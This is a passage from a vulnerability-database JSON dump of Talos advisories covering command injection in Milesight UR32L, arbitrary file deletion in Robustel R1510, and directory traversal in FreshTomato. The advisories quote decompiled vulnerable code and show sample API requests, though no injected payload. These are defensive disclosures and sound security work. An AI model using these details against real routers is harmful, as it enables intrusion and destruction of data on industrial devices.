"TALOS-2023-1703", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1703", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-11T18:54:22", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1714\n\n## Milesight UR32L vtysh_ubus tcpdump_start_cb OS command injection vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-22653\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the vtysh_ubus tcpdump_start_cb functionality of Milesight UR32L v32.3.0.5. A specially crafted HTTP request can lead to command execution. An authenticated attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe Milesight router offers several functionalities through the `/cgi` endpoint. The \u201ccore\u201d functionality we are considering is called `yruo_tools`. In this \u201ccore\u201d there is one function called \u201ctcpdump_start\u201d. This API is used to execute the \u201ctcpdump\u201d command using the provided data. Following is the `vtysh_ubus`\u2019s `tcpdump_start_cb` function, which is responsible for managing the \u201ctcpdump_start\u201d functionality:\n \n \n void tcpdump_start_cb(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4,\n undefined4 *param_5)\n \n {\n [... 
variable declaration ...]\n \n [... variable initialization ...]\n [...]\n if ((param_advanced == (blob_attr *)0x0) ||\n (advanced_value = (char *)blobmsg_get_string(param_advanced), *advanced_value == '\\0')) {\n [...]\n interface_value = (char *)blobmsg_get_string(param_interface);\n [...]\n strncpy(interface_ptr,interface_value,0x80);\n snprintf(last_param.interface,0x80,\"%s\",interface_ptr);\n is_equal = strcmp(interface_ptr,\"Any\");\n if (is_equal == 0) {\n interface_ptr = \"any\";\n interface_ptr_dup = zstrdup(1,interface_ptr);\n }\n else {\n interface_ptr_dup = if_name_display2ori(interface_ptr);\n [...]\n }\n snprintf(tcpdump_options_string,0x100,\"-i %s\",interface_ptr_dup);\n [...]\n if (0 < (int)port) {\n last_param.port = port;\n len = strlen(tcpdump_options_string);\n snprintf(tcpdump_options_string + len,0x100 - len,\" port %d\",port); [1]\n }\n [...]\n if (param_ip != (blob_attr *)0x0) {\n ip_value = (char *)blobmsg_get_string(param_ip);\n strncpy(host_string,ip_value,0x80);\n if (*host_string != 0) {\n snprintf(last_param.host,0x80,\"%s\",host_string);\n len = strlen(tcpdump_options_string);\n if ((int)port < 0) {\n temp = \"\";\n }\n else {\n temp = \" and\";\n }\n snprintf(tcpdump_options_string + len,0x100 - len,\"%s host %s\",temp,host_string); [2]\n }\n }\n [...]\n }\n else {\n strncpy(advanced_param_buff,advanced_value,0x100);\n strtok(advanced_param_buff,\";\");\n strtok(advanced_param_buff,\"|\");\n temp = advanced_param_buff._0_4_ & 0xff;\n if (temp != 0) {\n snprintf(last_param.advance,0x100,\"%s\",advanced_param_buff);\n snprintf(tcpdump_options_string,0x100,\" %s\",advanced_param_buff); [3]\n [...]\n }\n }\n [... 
populate the dest_location variable with the destination of the recorded pcap ...]\n [...]\n len = strlen(tcpdump_options_string);\n snprintf(tcpdump_options_string + len,0x100 - len,\" -w %s\",dest_location);\n snprintf(shell_command,0x200,\"%s %s \\\"%s\\\" \\\"%s\\\" \\\"%s\\\" 2>&1 &\",\"/usr/sbin/webtools.sh\",\"tcpdump\"\n ,tcpdump_options_string,dest_location,\"/tmp/webtcpdump.lock\"); [4]\n [...]\n system(shell_command); [5]\n [...]\n }\n \n\nThis function parses, at most, four possible params: \u201cinterface\u201d, \u201cip\u201d, \u201cport\u201d and \u201cadvanced\u201d. If the \u201cadvanced\u201d param is present and not empty, the other three are ignored. Otherwise, if the \u201cadvanced\u201d param is not present or its value is empty, the function will parse \u201cinterface\u201d, \u201cip\u201d and \u201cport\u201d.\n\nEventually the code at `[4]` is reached and the string `'/usr/sbin/webtools.sh tcpdump \"<tcpdump_options_string>\" \"dest_location\" \"/tmp/webtcpdump.lock\" 2>&1 &'` is composed. The `tcpdump_options_string` is composed using the provided parameters. For instance, at `[1]` the `' port <port>'` string is appended, and at `[2]` either `' host <host>'` or `' and host <host>'` is appended, depending on the presence of the \u201cport\u201d parameter. Otherwise, if the \u201cadvanced\u201d parameter is present, neither `[1]` nor `[2]` is reached; instead the code at `[3]` is executed.\n\nFollowing are two examples of commands that will result in the same composed string. 
Note that these commands must be sent by an authenticated user.\n \n \n {\n \"id\":60,\n \"execute\":1,\n \"core\":\"yruo_tools\",\n \"function\":\"tcpdump_start\",\n \"values\":[\n {\n \"interface\":\"Any\",\n \"ip\":\"192.168.0.100\",\n \"port\":12345,\n \"advanced\":\"\"\n }\n ]\n }\n \n\nThe above command uses the \u201cinterface\u201d, \u201cip\u201d and \u201cport\u201d params.\n \n \n {\n \"id\":60,\n \"execute\":1,\n \"core\":\"yruo_tools\",\n \"function\":\"tcpdump_start\",\n \"values\":[\n {\n \"interface\":\"\",\n \"ip\":\"\",\n \"port\":\"\",\n \"advanced\":\"-i any port 12345 and host 192.168.0.100\"\n }\n ]\n }\n \n\nThe above command uses only the \u201cadvanced\u201d param.\n\nEventually the string composed at `[4]` will be used as argument of the `system` function at `[5]`. No particular checks are performed against the parameters provided, which can lead to an OS command injection.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. 
See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1715\n\nPrevious Report\n\nTALOS-2023-1716\n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L vtysh_ubus tcpdump_start_cb OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22653"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1714", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1714", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:56:21", "description": "### Summary\n\nA data removal vulnerability exists in the web_server /action/remove/ API functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary file deletion. 
An attacker can send a sequence of requests to trigger this vulnerability.\n\n### Tested Versions\n\nRobustel R1510 3.3.0\n\n### Product URLs\n\nR1510 - <https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/>\n\n### CVSSv3 Score\n\n8.7 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H\n\n### CWE\n\nCWE-20 - Improper Input Validation\n\n### Details\n\nThe R1510 is an industrial cellular router. It offers several advanced software features, such as an innovative use of OpenVPN, cloud management, data over-use guard, smart reboot and others.\n\nThe R1510 has a web server that manages several APIs. One of these APIs is `/ajax/remove/`. This function removes files, checking the provided input for possible path traversal.\n\nHere is the function that handles the `/ajax/remove/` API:\n \n \n undefined4 /ajax/remove/(Webs *webs)\n \n {\n [...]\n \n [...]\n file_name = (char *)websGetVar(webs,\"file_name\",0); [1]\n if ((file_name != (char *)0x0) &&\n (shell_command = strstr(file_name,\"..\"), shell_command == (char *)0x0)) { [2]\n shell_command = (char *)sfmt(\"rm %s -rf\",file_name); [3]\n iVar1 = system(shell_command);\n [...]\n }\n \n\nAt `[1]` the variable `file_name` is fetched and then used, at `[3]`, to create the string `rm <file_name> -rf`. The function checks, at `[2]`, whether the provided `file_name` contains `..`. This check is presumably meant to prevent path traversal. 
However, because `file_name` can be an absolute path, an attacker able to control `file_name` would be able to delete arbitrary files and directories.\n\n### Timeline\n\n2022-06-27 - Initial vendor contact \n2022-06-28 - Vendor Disclosure \n2022-06-30 - Public Release \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-30T00:00:00", "type": "talos", "title": "Robustel R1510 web_server /action/remove/ API data removal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28127"], "modified": "2022-06-30T00:00:00", "id": "TALOS-2022-1571", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1571", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-12-02T18:55:50", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1642\n\n## FreshTomato httpd update.cgi directory traversal vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38451\n\n##### SUMMARY\n\nA directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. 
A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nFreshTomato 2022.5 \nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020 \nAdvancedTomato commit 67273b0\n\n##### PRODUCT URLS\n\nFreshTomato - <https://www.freshtomato.org/> QUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N\n\n##### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n##### DETAILS\n\nFreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\nThe FreshTomato\u2019s httpd component offers a simple template language to call an API during the loading of an HTML page. This process is performed through the `asp api`. The `asp api` is normally not directly callable, but a FreshTomato API called `update.cgi` allows it.\n\nFollowing is one of the functions responsible for performing the `update.cgi` API:\n \n \n static void wo_update(char *url)\n {\n const aspapi_t *api;\n const char *name;\n int argc;\n char *argv[16];\n char s[32];\n \n if ((name = webcgi_get(\"exec\")) != NULL) {\n for (api = aspapi; api->name; ++api) {\n if (strcmp(api->name, name) == 0) {\n for (argc = 0; argc < 16; ++argc) {\n snprintf(s, sizeof(s), \"arg%d\", argc);\n if ((argv[argc] = (char *)webcgi_get(s)) == NULL) break;\n }\n api->exec(argc, argv);\n break;\n }\n }\n }\n }\n \n\nThe `wo_update` function will take an `exec` parameter